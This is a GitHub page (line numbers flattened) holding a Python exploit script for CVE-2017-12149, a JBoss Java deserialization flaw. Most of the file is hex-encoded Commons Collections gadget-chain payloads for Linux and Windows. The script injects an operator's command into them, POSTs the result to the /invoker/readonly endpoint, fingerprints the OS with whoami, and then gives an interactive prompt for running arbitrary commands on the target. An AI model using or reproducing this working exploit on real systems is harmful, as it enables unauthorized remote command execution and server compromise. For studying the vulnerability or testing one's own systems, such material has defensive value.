/
CVE-2017-12149.py
154 lines (141 loc) · 9.46 KB
/
CVE-2017-12149.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
import requests
import binascii
import sys
import re
url_in = sys.argv[1]
linux_payload_1 = "aced0005737200116a6176612e7574696c2e48617368536574ba44859596b8b734030000" \
"7870770c000000023f40000000000001737200346f72672e6170616368652e636f6d6d6f" \
"6e732e636f6c6c656374696f6e732e6b657976616c75652e546965644d6170456e747279" \
"8aadd29b39c11fdb0200024c00036b65797400124c6a6176612f6c616e672f4f626a6563" \
"743b4c00036d617074000f4c6a6176612f7574696c2f4d61703b7870740003666f6f7372" \
"002a6f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e6d6170" \
"2e4c617a794d61706ee594829e7910940300014c0007666163746f727974002c4c6f7267" \
"2f6170616368652f636f6d6d6f6e732f636f6c6c656374696f6e732f5472616e73666f72" \
"6d65723b78707372003a6f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374" \
"696f6e732e66756e63746f72732e436861696e65645472616e73666f726d657230c797ec" \
"287a97040200015b000d695472616e73666f726d65727374002d5b4c6f72672f61706163" \
"68652f636f6d6d6f6e732f636f6c6c656374696f6e732f5472616e73666f726d65723b78" \
"707572002d5b4c6f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e" \
"732e5472616e73666f726d65723bbd562af1d83418990200007870000000067372003b6f" \
"72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e66756e63746f" \
"72732e436f6e7374616e745472616e73666f726d6572587690114102b1940200014c0009" \
"69436f6e7374616e7471007e00037870767200176a6176612e6e65742e55524c436c6173" \
"734c6f61646572000000000000000000000078707372003a6f72672e6170616368652e63" \
"6f6d6d6f6e732e636f6c6c656374696f6e732e66756e63746f72732e496e766f6b657254" \
"72616e73666f726d657287e8ff6b7b7cce380200035b000569417267737400135b4c6a61" \
"76612f6c616e672f4f626a6563743b4c000b694d6574686f644e616d657400124c6a6176" \
"612f6c616e672f537472696e673b5b000b69506172616d54797065737400125b4c6a6176" \
"612f6c616e672f436c6173733b7870757200135b4c6a6176612e6c616e672e4f626a6563" \
"743b90ce589f1073296c020000787000000001757200125b4c6a6176612e6c616e672e43" \
"6c6173733bab16d7aecbcd5a990200007870000000017672000f5b4c6a6176612e6e6574" \
"2e55524c3b5251fd24c51b68cd020000787074000e676574436f6e7374727563746f7275" \
"71007e001a000000017671007e001a7371007e00137571007e0018000000017571007e00" \
"18000000017571007e001c000000017372000c6a6176612e6e65742e55524c962537361a" \
"fce47203000749000868617368436f6465490004706f72744c0009617574686f72697479" \
"71007e00154c000466696c6571007e00154c0004686f737471007e00154c000870726f74" \
"6f636f6c71007e00154c000372656671007e00157870ffffffffffffffff707400052f74" \
"6d702f74000074000466696c65707874000b6e6577496e7374616e63657571007e001a00" \
"0000017671007e00187371007e00137571007e00180000000174000e52756e436865636b" \
"436f6e6669677400096c6f6164436c6173737571007e001a00000001767200106a617661" \
"2e6c616e672e537472696e67a0f0a4387a3bb34202000078707371007e00137571007e00" \
"18000000017571007e001a0000000171007e003371007e001e7571007e001a0000000171" \
"007e00207371007e00137571007e001800000001757200135b4c6a6176612e6c616e672e" \
"537472696e673badd256e7e91d7b470200007870000000017400"
win_payload_1 = "aced0005737200116a6176612e7574696c2e48617368536574ba44859596b8b734030000" \
"7870770c000000023f40000000000001737200346f72672e6170616368652e636f6d6d6f" \
"6e732e636f6c6c656374696f6e732e6b657976616c75652e546965644d6170456e747279" \
"8aadd29b39c11fdb0200024c00036b65797400124c6a6176612f6c616e672f4f626a6563" \
"743b4c00036d617074000f4c6a6176612f7574696c2f4d61703b7870740003666f6f7372" \
"002a6f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e6d6170" \
"2e4c617a794d61706ee594829e7910940300014c0007666163746f727974002c4c6f7267" \
"2f6170616368652f636f6d6d6f6e732f636f6c6c656374696f6e732f5472616e73666f72" \
"6d65723b78707372003a6f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374" \
"696f6e732e66756e63746f72732e436861696e65645472616e73666f726d657230c797ec" \
"287a97040200015b000d695472616e73666f726d65727374002d5b4c6f72672f61706163" \
"68652f636f6d6d6f6e732f636f6c6c656374696f6e732f5472616e73666f726d65723b78" \
"707572002d5b4c6f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e" \
"732e5472616e73666f726d65723bbd562af1d83418990200007870000000067372003b6f" \
"72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e66756e63746f" \
"72732e436f6e7374616e745472616e73666f726d6572587690114102b1940200014c0009" \
"69436f6e7374616e7471007e00037870767200176a6176612e6e65742e55524c436c6173" \
"734c6f61646572000000000000000000000078707372003a6f72672e6170616368652e63" \
"6f6d6d6f6e732e636f6c6c656374696f6e732e66756e63746f72732e496e766f6b657254" \
"72616e73666f726d657287e8ff6b7b7cce380200035b000569417267737400135b4c6a61" \
"76612f6c616e672f4f626a6563743b4c000b694d6574686f644e616d657400124c6a6176" \
"612f6c616e672f537472696e673b5b000b69506172616d54797065737400125b4c6a6176" \
"612f6c616e672f436c6173733b7870757200135b4c6a6176612e6c616e672e4f626a6563" \
"743b90ce589f1073296c020000787000000001757200125b4c6a6176612e6c616e672e43" \
"6c6173733bab16d7aecbcd5a990200007870000000017672000f5b4c6a6176612e6e6574" \
"2e55524c3b5251fd24c51b68cd020000787074000e676574436f6e7374727563746f7275" \
"71007e001a000000017671007e001a7371007e00137571007e0018000000017571007e00" \
"18000000017571007e001c000000017372000c6a6176612e6e65742e55524c962537361a" \
"fce47203000749000868617368436f6465490004706f72744c0009617574686f72697479" \
"71007e00154c000466696c6571007e00154c0004686f737471007e00154c000870726f74" \
"6f636f6c71007e00154c000372656671007e00157870ffffffffffffffff707400112f63" \
"3a2f77696e646f77732f74656d702f74000074000466696c65707874000b6e6577496e73" \
"74616e63657571007e001a000000017671007e00187371007e00137571007e0018000000" \
"0174000e52756e436865636b436f6e6669677400096c6f6164436c6173737571007e001a" \
"00000001767200106a6176612e6c616e672e537472696e67a0f0a4387a3bb34202000078" \
"707371007e00137571007e0018000000017571007e001a0000000171007e003371007e00" \
"1e7571007e001a0000000171007e00207371007e00137571007e00180000000175720013" \
"5b4c6a6176612e6c616e672e537472696e673badd256e7e91d7b47020000787000000001" \
"7400"
payload_2 = "71007e002a7571007e001a0000000171007e002c737200116a6176612e7574696c2e48617" \
"3684d61700507dac1c31660d103000246000a6c6f6164466163746f724900097468726573" \
"686f6c6478703f4000000000000077080000001000000000787878"
payload_other = ""
os_type = "unknown"
def build_command_hex(command):
command_exec_hex = "".join("{:02x}".format(ord(c)) for c in command)
command_len = len(command)
command_len_hex = '{:02x}'.format(command_len)
command_hex = command_len_hex + command_exec_hex
return command_hex
def build_payload(target_os, command):
global os_type
if os_type == "unknown":
if target_os == "linux":
payload = binascii.unhexlify(linux_payload_1 + build_command_hex(command) + payload_2)
if target_os == "windows":
payload = binascii.unhexlify(win_payload_1 + build_command_hex(command) + payload_2)
if os_type == "linux":
payload = binascii.unhexlify(linux_payload_1 + build_command_hex(command) + payload_2)
if os_type == "windows":
payload = binascii.unhexlify(win_payload_1 + build_command_hex(command) + payload_2)
return payload
def do_post(payload):
payload_url = url_in + "/invoker/readonly"
result = requests.post(payload_url, payload, verify=False)
result_content = str(result.content)
return result_content
def check_OS():
global os_type
payload_linux = build_payload('linux','whoami')
payload_win = build_payload('windows','whoami')
linux_re = do_post(payload_linux)
win_re = do_post(payload_win)
if "[L291919]" in linux_re:
os_type = 'linux'
if "[W291013]" in win_re:
os_type = 'windows'
return os_type
def run_command(command_in):
payload = build_payload(os_type,command_in)
result = do_post(payload)
result = re.findall ( '](.*?)RunCheckConfig',result, re.DOTALL)
if len(result) == 0:
result.append("command error!\n")
command_callback = result[0]
return command_callback
check_OS()
if os_type =="unknown":
print "******************************Target system is not exploitable*********************************"
exit(0)
print "***************************************************** \n" \
"**************** Coded By 1337g ****************** \n" \
"* Target system is " + os_type + " OS * \n" \
"***************************************************** \n"
while 1:
command_in = raw_input("Eneter your command here: ")
if command_in == "exit" : exit(0)
print run_command(command_in).decode('utf-8')